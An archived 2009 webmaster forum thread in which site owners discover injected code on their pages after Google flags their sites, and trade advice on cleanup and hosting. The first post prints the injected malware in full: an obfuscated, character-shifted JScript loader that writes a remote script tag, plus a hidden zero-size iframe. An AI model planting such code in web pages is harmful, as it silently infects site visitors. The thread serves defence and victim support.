Welcome to WebmasterWorld Guest from 54.162.239.134

Forum Moderators: phranque

Message Too Old, No Replies

Malware Traps?

     
12:32 pm on Apr 23, 2009 (gmt 0)

5+ Year Member



Not sure if this is the right place for this.

I recently got nailed by Google on some of my sites. They categorized my sites as "malware." Bizarre to say the least. I have been operating these sites for almost ten years. Anyway, I found a strange piece of code at the bottom of one of my pages:

<!-- ad --><html><script>
/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0hfpwj{ju0tubut/kt#?=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/
</script></html><!-- /ad --><!-- counter --><script language=javascript>status=location;document.write('<iframe src="http://example.com/trf.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');</script><!-- counter -->

I have no idea how this happened. Has anyone had this happen to them? HOW can this get on there? I want to prevent this kind of thing from happening in the future.

[edited by: engine at 7:34 pm (utc) on April 24, 2009]
[edit reason] examplified [/edit]

12:56 pm on Apr 23, 2009 (gmt 0)

5+ Year Member



This just happened to me also, any help would be greatly appreciated. Mine was a PunBB forum
1:05 pm on Apr 23, 2009 (gmt 0)

5+ Year Member



This is the exact same code found on my index and login php pages. EXACT. Not cool.
3:56 pm on Apr 23, 2009 (gmt 0)

5+ Year Member



Well I did not do it! lol
4:30 pm on Apr 23, 2009 (gmt 0)

5+ Year Member



what type of site was it?
11:14 am on Apr 24, 2009 (gmt 0)

5+ Year Member



Also had similar code added to a couple of sites recently,
'mysite.co.uk' and 'mysite.com'.
The 'mysite.co.uk' is a regional u.k. tourism site
and the 'mysite.com' is where i do my future development.

Both sites are on the same server located in the u.k.

Have now changed the passwords.

Regards

Neil

7:35 pm on Apr 26, 2009 (gmt 0)

5+ Year Member



Hi

I also had the same thing,

i deleted the codes and after 2 days it was up again on the index.php and login.php file on my site,

does anyone know what this is?

8:59 pm on Apr 26, 2009 (gmt 0)

WebmasterWorld Senior Member g1smd is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



Looks like you have been hacked with code that does something nasty when a visitor looks at the page.

That sort of attack is getting much more common; wordpress and other similar products have been targeted several times.

There's a lot of advice in previous threads. You need to go beyond cleaning out the code and changing the passwords. There is some fundamental loophole that the miscreants are taking advantage of.

9:01 am on Apr 28, 2009 (gmt 0)

5+ Year Member



The 'mysite.com' site was again attacked yesterday,
and google has blocked this site.

Regards Neil

9:55 am on Apr 28, 2009 (gmt 0)

WebmasterWorld Senior Member lammert is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



Shared hosting or VPS/dedicated?

If shared hosting, move to another hosting company. With shared hosting you have only limited possibilities to close such holes and with shared hosting many times the problem is caused by the hosting provider rather then the website operator.

6:37 am on Apr 29, 2009 (gmt 0)

5+ Year Member



Using shared hosting,
does VPS provide a higher level of security.
Is it still open to hackers adding malicious code?

Regards Neil

 

Featured Threads

Hot Threads This Week

Hot Threads This Month